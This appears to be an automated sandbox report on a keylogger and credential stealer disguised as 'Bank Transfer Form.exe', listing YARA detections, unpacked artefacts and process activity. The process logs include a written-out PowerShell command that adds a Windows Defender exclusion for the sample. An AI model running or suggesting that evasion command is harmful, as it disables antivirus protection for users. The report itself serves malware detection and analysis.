Source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Bank Transfer Form.exe PID: 7404, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Bank Transfer Form.exe PID: 7596, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

.NET source code contains very large strings

Source: Bank Transfer Form.exe, Form4.cs

Long String: Length: 169248

Source: C:\Users\user\Desktop\Bank Transfer Form.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_0114E044	0_2_0114E044
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_05FAF0A9	0_2_05FAF0A9
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_05FA0A80	0_2_05FA0A80
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_05FA0A70	0_2_05FA0A70
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_07777712	0_2_07777712
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_07775170	0_2_07775170
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_07770A20	0_2_07770A20
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_07775460	0_2_07775460
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_07775451	0_2_07775451
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_0777C438	0_2_0777C438
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_0777C429	0_2_0777C429
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_07775160	0_2_07775160
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_077741F0	0_2_077741F0
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_077741DF	0_2_077741DF
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_077741B9	0_2_077741B9
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_0777C000	0_2_0777C000
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_0777DF18	0_2_0777DF18
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_07772BF8	0_2_07772BF8
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_07770A10	0_2_07770A10
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_0777C870	0_2_0777C870
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_0777C860	0_2_0777C860
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_0777E848	0_2_0777E848
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 0_2_0F273660	0_2_0F273660
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_01807118	3_2_01807118
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_0180C147	3_2_0180C147
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_0180A088	3_2_0180A088
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_01805362	3_2_01805362
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_0180D278	3_2_0180D278
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_0180C468	3_2_0180C468
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_0180C738	3_2_0180C738
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_0180E988	3_2_0180E988
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_018069A0	3_2_018069A0
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_018029E0	3_2_018029E0
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_0180CA08	3_2_0180CA08
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_0180CCD8	3_2_0180CCD8
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_0180CFAB	3_2_0180CFAB
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_01803E09	3_2_01803E09
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_0180F631	3_2_0180F631
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_0180E97B	3_2_0180E97B
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_0180FA88	3_2_0180FA88
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F31E80	3_2_06F31E80
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F317A0	3_2_06F317A0
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F39C70	3_2_06F39C70
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F39548	3_2_06F39548
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F30B30	3_2_06F30B30
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F35028	3_2_06F35028
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F32968	3_2_06F32968
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3E6B0	3_2_06F3E6B0
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3E6AF	3_2_06F3E6AF
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F31E70	3_2_06F31E70
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3DE00	3_2_06F3DE00
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3178F	3_2_06F3178F
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3EF60	3_2_06F3EF60
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3EF51	3_2_06F3EF51
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3CCA0	3_2_06F3CCA0
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3FC68	3_2_06F3FC68
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F39C6D	3_2_06F39C6D
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3DDFF	3_2_06F3DDFF
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3D550	3_2_06F3D550
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3D540	3_2_06F3D540
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3EAF8	3_2_06F3EAF8
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3E258	3_2_06F3E258
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3E249	3_2_06F3E249
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3F3B8	3_2_06F3F3B8
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F38BA0	3_2_06F38BA0
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F38B90	3_2_06F38B90
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F30B20	3_2_06F30B20
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F39328	3_2_06F39328
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3EB08	3_2_06F3EB08
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3D0F8	3_2_06F3D0F8
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F30040	3_2_06F30040
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3F810	3_2_06F3F810
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F35018	3_2_06F35018
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3F801	3_2_06F3F801
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F30006	3_2_06F30006
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3D9A8	3_2_06F3D9A8
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3D999	3_2_06F3D999
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 3_2_06F3295A	3_2_06F3295A

Source: Bank Transfer Form.exe, 00000000.00000002.1712733368.0000000003018000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Bank Transfer Form.exe
Source: Bank Transfer Form.exe, 00000000.00000002.1706695502.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Bank Transfer Form.exe
Source: Bank Transfer Form.exe, 00000000.00000002.1718802395.0000000007200000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs Bank Transfer Form.exe
Source: Bank Transfer Form.exe, 00000000.00000002.1721411415.000000000B990000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Bank Transfer Form.exe
Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Bank Transfer Form.exe
Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Bank Transfer Form.exe
Source: Bank Transfer Form.exe, 00000000.00000000.1681888470.00000000008D2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameBxFK.exe. vs Bank Transfer Form.exe
Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Bank Transfer Form.exe
Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs Bank Transfer Form.exe
Source: Bank Transfer Form.exe, 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Bank Transfer Form.exe
Source: Bank Transfer Form.exe, 00000003.00000002.4139170776.00000000015B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dll vs Bank Transfer Form.exe
Source: Bank Transfer Form.exe, 00000003.00000002.4138787902.0000000001337000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Bank Transfer Form.exe
Source: Bank Transfer Form.exe	Binary or memory string: OriginalFilenameBxFK.exe. vs Bank Transfer Form.exe

Source: Bank Transfer Form.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Bank Transfer Form.exe PID: 7404, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Bank Transfer Form.exe PID: 7596, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, rSACETqoHL0qafdKnG.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, rSACETqoHL0qafdKnG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, rSACETqoHL0qafdKnG.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, rSACETqoHL0qafdKnG.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, rSACETqoHL0qafdKnG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, rSACETqoHL0qafdKnG.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, WPHP2SbJjmZSALkB5D.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, WPHP2SbJjmZSALkB5D.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, WPHP2SbJjmZSALkB5D.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, WPHP2SbJjmZSALkB5D.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, WPHP2SbJjmZSALkB5D.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Bank Transfer Form.exe.b990000.6.raw.unpack, WPHP2SbJjmZSALkB5D.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, rSACETqoHL0qafdKnG.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, rSACETqoHL0qafdKnG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, rSACETqoHL0qafdKnG.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/6@3/3

Source: C:\Users\user\Desktop\Bank Transfer Form.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Bank Transfer Form.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ageywabl.414.ps1

Jump to behavior

Source: Bank Transfer Form.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Bank Transfer Form.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\Bank Transfer Form.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Bank Transfer Form.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Bank Transfer Form.exe	ReversingLabs: Detection: 36%
Source: Bank Transfer Form.exe	Virustotal: Detection: 40%

Source: unknown	Process created: C:\Users\user\Desktop\Bank Transfer Form.exe "C:\Users\user\Desktop\Bank Transfer Form.exe"
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe"
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process created: C:\Users\user\Desktop\Bank Transfer Form.exe "C:\Users\user\Desktop\Bank Transfer Form.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Process created: C:\Users\user\Desktop\Bank Transfer Form.exe "C:\Users\user\Desktop\Bank Transfer Form.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Section loaded: version.dll	Jump to behavior
